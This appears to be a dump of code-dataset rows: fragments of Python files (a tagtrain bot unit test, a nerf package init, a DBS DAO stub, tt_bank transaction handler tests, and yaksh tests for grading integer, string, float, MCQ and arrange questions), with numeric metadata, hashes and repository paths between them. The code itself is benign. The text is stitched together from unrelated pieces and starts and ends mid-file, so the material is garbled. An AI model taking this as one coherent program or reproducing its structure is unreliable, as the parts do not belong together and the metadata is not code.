add_user_to_group.assert_called_once_with('OwnerName', 'GroupName', 'AuthorName', 'PermaLink')
reply.append.assert_called_once_with("You were added to `OwnerName`'s Group `GroupName`, 1 total Members.")
@patch('tagtrain.data.by_member.add_user_to_group')
@patch('tagtrain.data.by_owner.find_group')
def test_blacklisted(find_group, add_user_to_group):
group = fake.create_group(name='GroupName', member_count=1, locked=None)
find_group.return_value = group
add_user_to_group.side_effect = data.by_member.Blacklisted()
app, reply, message, match = fake.create_all()
AddMe(app).run(reply, message, match)
find_group.assert_called_once_with('OwnerName', 'GroupName')
add_user_to_group.assert_called_once_with('OwnerName', 'GroupName', 'AuthorName', 'PermaLink')
reply.append.assert_called_once_with("You are Blacklisted from adding yourself to Group `GroupName`. Skipping.")
| 40.164706
| 117
| 0.764792
| 495
| 3,414
| 4.945455
| 0.151515
| 0.05719
| 0.069853
| 0.10866
| 0.805964
| 0.805964
| 0.796569
| 0.796569
| 0.796569
| 0.796569
| 0
| 0.001657
| 0.116286
| 3,414
| 84
| 118
| 40.642857
| 0.809745
| 0
| 0
| 0.672414
| 0
| 0
| 0.278266
| 0.108377
| 0
| 0
| 0
| 0
| 0.258621
| 1
| 0.086207
| false
| 0
| 0.086207
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fbc4ed30b9b2f12d4224cde32a4f7f89c2553705
| 134
|
py
|
Python
|
nerf/__init__.py
|
AnimatedRNG/nerf-jax
|
c940bcfbb986623691aff7a4e28bf8273ea70147
|
[
"Apache-2.0"
] | 5
|
2020-10-22T07:27:15.000Z
|
2022-02-25T02:54:39.000Z
|
nerf/__init__.py
|
AnimatedRNG/nerf-jax
|
c940bcfbb986623691aff7a4e28bf8273ea70147
|
[
"Apache-2.0"
] | 11
|
2021-01-27T01:52:38.000Z
|
2021-02-03T06:35:34.000Z
|
nerf/__init__.py
|
AnimatedRNG/nerf-jax
|
c940bcfbb986623691aff7a4e28bf8273ea70147
|
[
"Apache-2.0"
] | 2
|
2020-12-15T14:44:07.000Z
|
2021-01-27T03:39:01.000Z
|
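# Package-level re-exports: make the public names of the nerf submodules
# available directly from the top-level package.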
from .nerf_dataset import *
from .nerf_helpers import *
from .train_utils import *
from .models import *
from .volume_render import *
| 22.333333
| 28
| 0.776119
| 19
| 134
| 5.263158
| 0.526316
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149254
| 134
| 5
| 29
| 26.8
| 0.877193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
83dedc660023d9672a127ba94f75f5d3a9210b27
| 198
|
py
|
Python
|
Server/Python/src/dbs/dao/MySQL/DatasetType/Insert.py
|
vkuznet/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 8
|
2015-08-14T04:01:32.000Z
|
2021-06-03T00:56:42.000Z
|
Server/Python/src/dbs/dao/MySQL/DatasetType/Insert.py
|
yuyiguo/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 162
|
2015-01-07T21:34:47.000Z
|
2021-10-13T09:42:41.000Z
|
Server/Python/src/dbs/dao/MySQL/DatasetType/Insert.py
|
yuyiguo/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 16
|
2015-01-22T15:27:29.000Z
|
2021-04-28T09:23:28.000Z
|
#!/usr/bin/env python
""" DAO Object for DatasetTypes table """
from dbs.dao.Oracle.DatasetType.Insert import Insert as OraDatasetTypeInsert
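# The MySQL DAO reuses the Oracle implementation unchanged: the subclass
# below overrides nothing, so both backends share the same insert logic.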
class Insert(OraDatasetTypeInsert):
pass
| 22
| 76
| 0.737374
| 23
| 198
| 6.347826
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.171717
| 198
| 8
| 77
| 24.75
| 0.890244
| 0.277778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
83e0f43b931ea28afa3726093155837d3abd708d
| 11,324
|
py
|
Python
|
src/tt_bank/tt_bank/tests/test_handlers.py
|
devapromix/the-tale
|
2a10efd3270734f8cf482b4cfbc5353ef8f0494c
|
[
"BSD-3-Clause"
] | 1
|
2020-04-02T11:51:20.000Z
|
2020-04-02T11:51:20.000Z
|
src/tt_bank/tt_bank/tests/test_handlers.py
|
devapromix/the-tale
|
2a10efd3270734f8cf482b4cfbc5353ef8f0494c
|
[
"BSD-3-Clause"
] | null | null | null |
src/tt_bank/tt_bank/tests/test_handlers.py
|
devapromix/the-tale
|
2a10efd3270734f8cf482b4cfbc5353ef8f0494c
|
[
"BSD-3-Clause"
] | null | null | null |
import datetime
from aiohttp import test_utils
from tt_protocol.protocol import bank_pb2
from tt_web import postgresql as db
from .. import relations
from . import helpers
TEST_OPERATIONS = [bank_pb2.Operation(account_id=666, currency=1, amount=-1000, type='x.1', description='y.1'),
bank_pb2.Operation(account_id=667, currency=1, amount=300, type='x.2', description='y.2'),
bank_pb2.Operation(account_id=666, currency=1, amount=500, type='x.3', description='y.3'),
bank_pb2.Operation(account_id=667, currency=1, amount=-100, type='x.4', description='y.4')]
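# Sign convention inferred from the assertions below: negative amounts are
# withdrawals and positive amounts are deposits; withdrawals are applied as
# soon as a transaction starts, deposits only once it is committed.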
async def load_operations():
results = await db.sql('SELECT * FROM operations ORDER BY created_at ASC')
return [bank_pb2.Operation(account_id=row['account'],
currency=row['currency'],
amount=row['amount'],
type=row['type'],
description=row['description']) for row in results]
class Base(helpers.BaseTests):
async def check_balance(self, account_id, expected_balance):
request = await self.client.post('/accounts/balance', data=bank_pb2.AccountBalanceRequest(account_id=account_id).SerializeToString())
answer = await self.check_success(request, bank_pb2.AccountBalanceResponse)
self.assertEqual(answer.balance, expected_balance)
class AccountBalanceTests(Base):
@test_utils.unittest_run_loop
async def test_no_balance(self):
await self.check_balance(account_id=666, expected_balance={})
@test_utils.unittest_run_loop
async def test_has_record(self):
await helpers.call_change_balance(account_id=666, currency=1, amount=101)
await self.check_balance(account_id=666, expected_balance={1: 101})
@test_utils.unittest_run_loop
async def test_multiple_currencies(self):
await helpers.call_change_balance(account_id=666, currency=1, amount=101)
await helpers.call_change_balance(account_id=666, currency=2, amount=13)
await self.check_balance(account_id=666, expected_balance={1: 101, 2: 13})
class AccountHistoryTests(Base):
@test_utils.unittest_run_loop
async def test_no_history(self):
request = await self.client.post('/accounts/history', data=bank_pb2.AccountHistoryRequest(account_id=666).SerializeToString())
answer = await self.check_success(request, bank_pb2.AccountHistoryResponse)
self.assertEqual(list(answer.history), [])
async def apply_operations(self, test_operations):
request = await self.client.post('/transactions/start', data=bank_pb2.StartTransactionRequest(operations=test_operations,
lifetime=0).SerializeToString())
answer = await self.check_success(request, bank_pb2.StartTransactionResponse)
await self.client.post('/transactions/commit', data=bank_pb2.CommitTransactionRequest(transaction_id=answer.transaction_id).SerializeToString())
@test_utils.unittest_run_loop
async def test_has_records(self):
await helpers.call_change_balance(account_id=666, currency=1, amount=1000)
await self.apply_operations([bank_pb2.Operation(account_id=666, currency=1, amount=1000, type='x.1', description='y.1'),
bank_pb2.Operation(account_id=666, currency=1, amount=-300, type='x.2', description='y.2')])
await self.apply_operations([bank_pb2.Operation(account_id=667, currency=1, amount=50, type='x.3', description='y.3'),
bank_pb2.Operation(account_id=666, currency=1, amount=-1, type='x.4', description='y.4')])
request = await self.client.post('/accounts/history', data=bank_pb2.AccountHistoryRequest(account_id=666).SerializeToString())
answer = await self.check_success(request, bank_pb2.AccountHistoryResponse)
self.assertEqual([(record.amount, record.description) for record in answer.history],
[(1000, 'y.1'),
(-300, 'y.2'),
(-1, 'y.4')])
@test_utils.unittest_run_loop
async def test_multiple_currencies(self):
await helpers.call_change_balance(account_id=666, currency=1, amount=1000)
await self.apply_operations([bank_pb2.Operation(account_id=666, currency=1, amount=1000, type='x.1', description='y.1'),
bank_pb2.Operation(account_id=666, currency=1, amount=-300, type='x.2', description='y.2')])
await self.apply_operations([bank_pb2.Operation(account_id=667, currency=1, amount=50, type='x.3', description='y.3'),
bank_pb2.Operation(account_id=666, currency=2, amount=1, type='x.4', description='y.4')])
request = await self.client.post('/accounts/history', data=bank_pb2.AccountHistoryRequest(account_id=666).SerializeToString())
answer = await self.check_success(request, bank_pb2.AccountHistoryResponse)
self.assertEqual([(record.currency, record.amount, record.description) for record in answer.history],
[(1, 1000, 'y.1'),
(1, -300, 'y.2'),
(2, 1, 'y.4')])
class StartTransactionTests(Base):
@test_utils.unittest_run_loop
async def test_no_operations(self):
request = await self.client.post('/transactions/start', data=bank_pb2.StartTransactionRequest(operations=[],
lifetime=0).SerializeToString())
await self.check_error(request, error='bank.start_transaction.no_operations_specified')
@test_utils.unittest_run_loop
async def test_started(self):
await helpers.call_change_balance(account_id=666, currency=1, amount=1000)
await helpers.call_change_balance(account_id=667, currency=1, amount=1000)
lifetime = datetime.timedelta(seconds=100)
request = await self.client.post('/transactions/start', data=bank_pb2.StartTransactionRequest(operations=TEST_OPERATIONS,
lifetime=100).SerializeToString())
answer = await self.check_success(request, bank_pb2.StartTransactionResponse)
results = await db.sql('SELECT * FROM transactions WHERE id=%(id)s', {'id': answer.transaction_id})
self.assertEqual(results[0]['state'], relations.TRANSACTION_STATE.OPENED.value)
self.assertEqual(results[0]['lifetime'], lifetime)
results = await db.sql('SELECT transaction FROM operations')
loaded_operations = await load_operations()
self.assertEqual(TEST_OPERATIONS, loaded_operations)
# only withdrawals are applied on transaction start
await self.check_balance(account_id=666, expected_balance={1: 0})
await self.check_balance(account_id=667, expected_balance={1: 900})
@test_utils.unittest_run_loop
async def test_small_balance(self):
request = await self.client.post('/transactions/start', data=bank_pb2.StartTransactionRequest(operations=TEST_OPERATIONS,
lifetime=0).SerializeToString())
await self.check_error(request, error='bank.start_transaction.no_enough_currency')
results = await db.sql('SELECT * FROM transactions')
self.assertEqual(results, [])
results = await db.sql('SELECT * FROM operations ORDER BY created_at ASC')
self.assertEqual(results, [])
await self.check_balance(account_id=666, expected_balance={})
await self.check_balance(account_id=667, expected_balance={})
class RollbackTransactionTests(Base):
@test_utils.unittest_run_loop
async def test_rollback(self):
await helpers.call_change_balance(account_id=666, currency=1, amount=1000)
await helpers.call_change_balance(account_id=667, currency=1, amount=1000)
request = await self.client.post('/transactions/start', data=bank_pb2.StartTransactionRequest(operations=TEST_OPERATIONS,
lifetime=100).SerializeToString())
answer = await self.check_success(request, bank_pb2.StartTransactionResponse)
request = await self.client.post('/transactions/rollback', data=bank_pb2.RollbackTransactionRequest(transaction_id=answer.transaction_id).SerializeToString())
answer = await self.check_success(request, bank_pb2.StartTransactionResponse)
results = await db.sql('SELECT * FROM transactions')
self.assertEqual(results[0]['state'], relations.TRANSACTION_STATE.ROLLBACKED.value)
results = await db.sql('SELECT * FROM operations ORDER BY created_at ASC')
self.assertEqual(results, [])
await self.check_balance(account_id=666, expected_balance={1: 1000})
await self.check_balance(account_id=667, expected_balance={1: 1000})
@test_utils.unittest_run_loop
async def test_no_transaction_to_rollback(self):
request = await self.client.post('/transactions/rollback', data=bank_pb2.RollbackTransactionRequest(transaction_id=666).SerializeToString())
await self.check_error(request, error='bank.rollback_transaction.no_transacton_to_rollback')
class CommitTransactionTests(Base):
@test_utils.unittest_run_loop
async def test_commit(self):
await helpers.call_change_balance(account_id=666, currency=1, amount=1000)
await helpers.call_change_balance(account_id=667, currency=1, amount=1000)
lifetime = datetime.timedelta(seconds=100)
request = await self.client.post('/transactions/start', data=bank_pb2.StartTransactionRequest(operations=TEST_OPERATIONS,
lifetime=100).SerializeToString())
answer = await self.check_success(request, bank_pb2.StartTransactionResponse)
request = await self.client.post('/transactions/commit', data=bank_pb2.CommitTransactionRequest(transaction_id=answer.transaction_id).SerializeToString())
answer = await self.check_success(request, bank_pb2.CommitTransactionResponse)
results = await db.sql('SELECT * FROM transactions')
self.assertEqual(results[0]['state'], relations.TRANSACTION_STATE.COMMITED.value)
self.assertEqual(results[0]['lifetime'], lifetime)
loaded_operations = await load_operations()
self.assertEqual(TEST_OPERATIONS, loaded_operations)
# only withdrawals are applied on transaction start
await self.check_balance(account_id=666, expected_balance={1: 500})
await self.check_balance(account_id=667, expected_balance={1: 1200})
@test_utils.unittest_run_loop
async def test_no_transaction_to_commit(self):
request = await self.client.post('/transactions/commit', data=bank_pb2.CommitTransactionRequest(transaction_id=666).SerializeToString())
await self.check_error(request, error='bank.commit_transaction.no_transacton_to_commit')
| 51.472727
| 166
| 0.672466
| 1,305
| 11,324
| 5.636015
| 0.098851
| 0.053841
| 0.04242
| 0.043508
| 0.860503
| 0.853977
| 0.845139
| 0.832087
| 0.815092
| 0.752141
| 0
| 0.040784
| 0.220505
| 11,324
| 219
| 167
| 51.707763
| 0.792455
| 0.007683
| 0
| 0.482993
| 0
| 0
| 0.082606
| 0.020385
| 0
| 0
| 0
| 0
| 0.095238
| 1
| 0
| false
| 0
| 0.040816
| 0
| 0.088435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f7a6cf662c87426100707d316c14ec5fadcf050d
| 33,140
|
py
|
Python
|
yaksh/evaluator_tests/test_simple_question_types.py
|
tyochans/online_test
|
4eb754c2e71922819de7390d1b4993a21763de3e
|
[
"Python-2.0"
] | 1
|
2022-03-21T11:14:17.000Z
|
2022-03-21T11:14:17.000Z
|
yaksh/evaluator_tests/test_simple_question_types.py
|
tyochans/online_test
|
4eb754c2e71922819de7390d1b4993a21763de3e
|
[
"Python-2.0"
] | null | null | null |
yaksh/evaluator_tests/test_simple_question_types.py
|
tyochans/online_test
|
4eb754c2e71922819de7390d1b4993a21763de3e
|
[
"Python-2.0"
] | null | null | null |
import unittest
from datetime import datetime, timedelta
from django.utils import timezone
from textwrap import dedent
import pytz
from yaksh.models import User, Profile, Question, Quiz, QuestionPaper,\
AnswerPaper, Answer, Course, IntegerTestCase, FloatTestCase,\
StringTestCase, McqTestCase, ArrangeTestCase
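# These tests exercise AnswerPaper.validate_answer and AnswerPaper.regrade
# for the simple question types: integer, string, float, MCQ and arrange.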
def setUpModule():
# Create user profile
# Create User 1
user = User.objects.create_user(username='demo_user_100',
password='demo',
email='demo@test.com')
Profile.objects.create(user=user, roll_number=1,
institute='IIT', department='Aerospace',
position='Student')
# Create User 2
user2 = User.objects.create_user(
username='demo_user_101', password='demo',
email='demo@test.com')
Profile.objects.create(user=user2, roll_number=2,
institute='IIT', department='Aerospace',
position='Student')
# Create a course
Course.objects.create(name="Python Course 100",
enrollment="Enroll Request", creator=user)
quiz = Quiz.objects.create(
start_date_time=datetime(2015, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
end_date_time=datetime(2199, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
duration=30, active=True, attempts_allowed=1,
time_between_attempts=0, pass_criteria=0,
description='demo quiz 100',
instructions="Demo Instructions",
creator=user
)
QuestionPaper.objects.create(quiz=quiz, total_marks=1.0)
def tearDownModule():
User.objects.filter(username__in=["demo_user_100", "demo_user_101"])\
.delete()
class IntegerQuestionTestCases(unittest.TestCase):
@classmethod
def setUpClass(self):
# Creating Course
self.course = Course.objects.get(name="Python Course 100")
# Creating Quiz
self.quiz = Quiz.objects.get(description="demo quiz 100")
# Creating Question paper
self.question_paper = QuestionPaper.objects.get(quiz=self.quiz)
# Creating User
self.user = User.objects.get(username='demo_user_100')
# Creating Question
self.question1 = Question.objects.create(summary='int1', points=1,
type='code', user=self.user)
self.question1.language = 'python'
self.question1.type = "integer"
self.question1.test_case_type = 'integertestcase'
self.question1.description = 'sum of 12+13?'
self.question1.save()
# Creating answerpaper
self.answerpaper = AnswerPaper.objects.create(
user=self.user, user_ip='101.0.0.1', start_time=timezone.now(),
question_paper=self.question_paper, course=self.course,
end_time=timezone.now()+timedelta(minutes=5), attempt_number=1
)
self.answerpaper.questions.add(self.question1)
self.answerpaper.save()
# For question
self.integer_based_testcase = IntegerTestCase(question=self.question1,
correct=25,
type='integertestcase',
)
self.integer_based_testcase.save()
@classmethod
def tearDownClass(self):
self.question1.delete()
self.answerpaper.delete()
def test_validate_regrade_integer_correct_answer(self):
# Given
integer_answer = 25
self.answer = Answer(question=self.question1,
answer=integer_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
self.answerpaper.save()
# When
json_data = None
result = self.answerpaper.validate_answer(integer_answer,
self.question1,
json_data,
)
# Then
self.assertTrue(result['success'])
# Regrade
# Given
regrade_answer = Answer.objects.get(id=self.answer.id)
regrade_answer.answer = 200
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question1.id)
# Then
self.answer = self.answerpaper.answers.filter(question=self.question1
).last()
self.assertEqual(self.answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 0)
self.assertFalse(self.answer.correct)
def test_validate_regrade_integer_incorrect_answer(self):
# Given
integer_answer = 26
self.answer = Answer(question=self.question1,
answer=integer_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(integer_answer,
self.question1, json_data
)
# Then
self.assertFalse(result['success'])
# Regrade
# Given
regrade_answer = Answer.objects.get(id=self.answer.id)
regrade_answer.answer = 25
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question1.id)
# Then
self.answer = self.answerpaper.answers.filter(question=self.question1
).last()
self.assertEqual(self.answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 1)
self.assertTrue(self.answer.correct)
class StringQuestionTestCases(unittest.TestCase):
@classmethod
def setUpClass(self):
# Creating Course
self.course = Course.objects.get(name="Python Course 100")
# Creating Quiz
self.quiz = Quiz.objects.get(description="demo quiz 100")
# Creating Question paper
self.question_paper = QuestionPaper.objects.get(quiz=self.quiz)
# Creating User
self.user = User.objects.get(username='demo_user_100')
# Creating Question
self.question1 = Question.objects.create(summary='str1', points=1,
type='code', user=self.user)
self.question1.language = 'python'
self.question1.type = "string"
self.question1.test_case_type = 'stringtestcase'
self.question1.description = 'Write Hello, EARTH!'
self.question1.save()
self.question2 = Question.objects.create(summary='str2', points=1,
type='code', user=self.user)
self.question2.language = 'python'
self.question2.type = "string"
self.question2.test_case_type = 'stringtestcase'
self.question2.description = 'Write Hello, EARTH!'
self.question2.save()
# Creating answerpaper
self.answerpaper = AnswerPaper.objects.create(
user=self.user, user_ip='101.0.0.1', start_time=timezone.now(),
question_paper=self.question_paper, course=self.course,
end_time=timezone.now()+timedelta(minutes=5), attempt_number=1
)
self.answerpaper.questions.add(*[self.question1, self.question2])
self.answerpaper.save()
# For question
self.lower_string_testcase = StringTestCase(question=self.question1,
correct="Hello, EARTH!",
string_check="lower",
type='stringtestcase',
)
self.lower_string_testcase.save()
self.exact_string_testcase = StringTestCase(question=self.question2,
correct="Hello, EARTH!",
string_check="exact",
type='stringtestcase',
)
self.exact_string_testcase.save()
@classmethod
def tearDownClass(self):
self.question1.delete()
self.question2.delete()
self.answerpaper.delete()
def test_validate_regrade_case_insensitive_string_correct_answer(self):
# Given
string_answer = "hello, earth!"
answer = Answer(question=self.question1, answer=string_answer)
answer.save()
self.answerpaper.answers.add(answer)
# When
json_data = None
result = self.answerpaper.validate_answer(string_answer,
self.question1, json_data
)
# Then
self.assertTrue(result['success'])
# Regrade
# Given
regrade_answer = Answer.objects.get(id=answer.id)
regrade_answer.answer = "hello, mars!"
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question1.id)
# Then
answer = self.answerpaper.answers.filter(
question=self.question1).last()
self.assertEqual(answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(answer.marks, 0)
self.assertFalse(answer.correct)
def test_validate_regrade_case_insensitive_string_incorrect_answer(self):
# Given
string_answer = "hello, mars!"
answer = Answer(question=self.question1, answer=string_answer)
answer.save()
self.answerpaper.answers.add(answer)
# When
json_data = None
result = self.answerpaper.validate_answer(string_answer,
self.question1, json_data
)
# Then
self.assertFalse(result['success'])
# Regrade
# Given
regrade_answer = Answer.objects.get(id=answer.id)
regrade_answer.answer = "hello, earth!"
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question1.id)
# Then
answer = self.answerpaper.answers.filter(
question=self.question1).last()
self.assertEqual(answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(answer.marks, 1)
self.assertTrue(answer.correct)
def test_validate_regrade_case_sensitive_string_correct_answer(self):
# Given
string_answer = "Hello, EARTH!"
answer = Answer(question=self.question2, answer=string_answer)
answer.save()
self.answerpaper.answers.add(answer)
# When
json_data = None
result = self.answerpaper.validate_answer(string_answer,
self.question2, json_data
)
# Then
self.assertTrue(result['success'])
# Regrade
# Given
regrade_answer = Answer.objects.get(id=answer.id)
regrade_answer.answer = "hello, earth!"
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question2.id)
# Then
answer = self.answerpaper.answers.filter(
question=self.question2).last()
self.assertEqual(answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(answer.marks, 0)
self.assertFalse(answer.correct)
def test_case_sensitive_string_incorrect_answer(self):
# Given
string_answer = "hello, earth!"
answer = Answer(question=self.question2, answer=string_answer)
answer.save()
self.answerpaper.answers.add(answer)
# When
json_data = None
result = self.answerpaper.validate_answer(string_answer,
self.question2, json_data
)
# Then
self.assertFalse(result['success'])
# Regrade
# Given
regrade_answer = Answer.objects.get(id=answer.id)
regrade_answer.answer = "Hello, EARTH!"
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question2.id)
# Then
answer = self.answerpaper.answers.filter(
question=self.question2).last()
self.assertEqual(answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(answer.marks, 1)
self.assertTrue(answer.correct)
class FloatQuestionTestCases(unittest.TestCase):
@classmethod
def setUpClass(self):
# Creating Course
self.course = Course.objects.get(name="Python Course 100")
# Creating Quiz
self.quiz = Quiz.objects.get(description="demo quiz 100")
# Creating Question paper
self.question_paper = QuestionPaper.objects.get(quiz=self.quiz)
# Creating User
self.user = User.objects.get(username='demo_user_100')
# Creating Question
self.question1 = Question.objects.create(summary='flt1', points=1,
type='code', user=self.user)
self.question1.language = 'python'
self.question1.type = "float"
self.question1.test_case_type = 'floattestcase'
self.question1.save()
# Creating answerpaper
self.answerpaper = AnswerPaper.objects.create(
user=self.user, user_ip='101.0.0.1', start_time=timezone.now(),
question_paper=self.question_paper, course=self.course,
end_time=timezone.now()+timedelta(minutes=5), attempt_number=1,
)
self.answerpaper.questions.add(self.question1)
self.answerpaper.save()
# For question
self.float_based_testcase = FloatTestCase(question=self.question1,
correct=100,
error_margin=0.1,
type='floattestcase',
)
self.float_based_testcase.save()
@classmethod
def tearDownClass(self):
self.question1.delete()
self.answerpaper.delete()
def test_validate_regrade_float_correct_answer(self):
# Given
float_answer = 99.9
self.answer = Answer(question=self.question1,
answer=float_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(float_answer,
self.question1,
json_data,
)
# Then
self.assertTrue(result['success'])
# Regrade with wrong answer
# Given
regrade_answer = Answer.objects.get(id=self.answer.id)
regrade_answer.answer = 0.0
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question1.id)
# Then
self.answer = self.answerpaper.answers.filter(question=self.question1
).last()
self.assertEqual(self.answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 0)
self.assertFalse(self.answer.correct)
def test_float_incorrect_answer(self):
# Given
float_answer = 99.8
self.answer = Answer(question=self.question1,
answer=float_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(float_answer,
self.question1, json_data
)
# Then
self.assertFalse(result['success'])
# Regrade
# Given
regrade_answer = Answer.objects.get(id=self.answer.id)
regrade_answer.answer = 99.9
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question1.id)
# Then
self.answer = self.answerpaper.answers.filter(question=self.question1
).last()
self.assertEqual(self.answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 1)
self.assertTrue(self.answer.correct)
class MCQQuestionTestCases(unittest.TestCase):
@classmethod
def setUpClass(self):
# Creating User
self.user = User.objects.get(username='demo_user_100')
self.user2 = User.objects.get(username='demo_user_101')
self.user_ip = '127.0.0.1'
# Creating Course
self.course = Course.objects.get(name="Python Course 100")
# Creating Quiz
self.quiz = Quiz.objects.get(description="demo quiz 100")
# Creating Question paper
self.question_paper = QuestionPaper.objects.get(quiz=self.quiz)
self.question_paper.shuffle_testcases = True
self.question_paper.save()
# Creating Question
self.question1 = Question.objects.create(summary='mcq1', points=1,
type='code', user=self.user,
)
self.question1.language = 'python'
self.question1.type = "mcq"
self.question1.test_case_type = 'Mcqtestcase'
self.question1.description = 'Which option is Correct?'
self.question1.save()
# For questions
self.mcq_based_testcase_1 = McqTestCase(question=self.question1,
options="Correct",
correct=True,
type='mcqtestcase',
)
self.mcq_based_testcase_1.save()
self.mcq_based_testcase_2 = McqTestCase(question=self.question1,
options="Incorrect",
correct=False,
type='mcqtestcase',
)
self.mcq_based_testcase_2.save()
self.mcq_based_testcase_3 = McqTestCase(question=self.question1,
options="Incorrect",
correct=False,
type='mcqtestcase',
)
self.mcq_based_testcase_3.save()
self.mcq_based_testcase_4 = McqTestCase(question=self.question1,
options="Incorrect",
correct=False,
type='mcqtestcase',
)
self.mcq_based_testcase_4.save()
self.question_paper.fixed_questions.add(self.question1)
self.answerpaper = self.question_paper.make_answerpaper(
user=self.user, ip=self.user_ip,
attempt_num=1,
course_id=self.course.id
)
# Answerpaper for user 2
self.answerpaper2 = self.question_paper.make_answerpaper(
user=self.user2, ip=self.user_ip,
attempt_num=1,
course_id=self.course.id
)
@classmethod
def tearDownClass(self):
self.question1.delete()
self.answerpaper.delete()
self.answerpaper2.delete()
def test_shuffle_test_cases(self):
# Given
# When
user_testcase = self.question1.get_ordered_test_cases(
self.answerpaper
)
order1 = [tc.id for tc in user_testcase]
user2_testcase = self.question1.get_ordered_test_cases(
self.answerpaper2
)
order2 = [tc.id for tc in user2_testcase]
self.question_paper.shuffle_testcases = False
self.question_paper.save()
answerpaper3 = self.question_paper.make_answerpaper(
user=self.user2, ip=self.user_ip,
attempt_num=self.answerpaper.attempt_number+1,
course_id=self.course.id
)
not_ordered_testcase = self.question1.get_ordered_test_cases(
answerpaper3
)
get_test_cases = self.question1.get_test_cases()
# Then
self.assertNotEqual(order1, order2)
self.assertEqual(get_test_cases, not_ordered_testcase)
class ArrangeQuestionTestCases(unittest.TestCase):
@classmethod
def setUpClass(self):
# Creating Course
self.course = Course.objects.get(name="Python Course 100")
# Creating Quiz
self.quiz = Quiz.objects.get(description="demo quiz 100")
# Creating Question paper
self.question_paper = QuestionPaper.objects.get(quiz=self.quiz,
total_marks=1.0)
# Creating User
self.user = User.objects.get(username='demo_user_100')
# Creating Question
self.question1 = Question.objects.create(summary='arrange1',
points=1.0,
user=self.user
)
self.question1.language = 'python'
self.question1.type = "arrange"
self.question1.description = "Arrange alphabets in ascending order"
self.question1.test_case_type = 'arrangetestcase'
self.question1.save()
# Creating answerpaper
self.answerpaper = AnswerPaper.objects.create(
user=self.user, user_ip='101.0.0.1', course=self.course,
start_time=timezone.now(), question_paper=self.question_paper,
end_time=timezone.now()+timedelta(minutes=5), attempt_number=1
)
self.answerpaper.questions.add(self.question1)
self.answerpaper.save()
# For question
self.arrange_testcase_1 = ArrangeTestCase(question=self.question1,
options="A",
type='arrangetestcase',
)
self.arrange_testcase_1.save()
self.testcase_1_id = self.arrange_testcase_1.id
self.arrange_testcase_2 = ArrangeTestCase(question=self.question1,
options="B",
type='arrangetestcase',
)
self.arrange_testcase_2.save()
self.testcase_2_id = self.arrange_testcase_2.id
self.arrange_testcase_3 = ArrangeTestCase(question=self.question1,
options="C",
type='arrangetestcase',
)
self.arrange_testcase_3.save()
self.testcase_3_id = self.arrange_testcase_3.id
@classmethod
def tearDownClass(self):
self.question1.delete()
self.answerpaper.delete()
def test_validate_regrade_arrange_correct_answer(self):
# Given
arrange_answer = [self.testcase_1_id,
self.testcase_2_id,
self.testcase_3_id,
]
self.answer = Answer(question=self.question1,
answer=arrange_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(arrange_answer,
self.question1,
json_data,
)
# Then
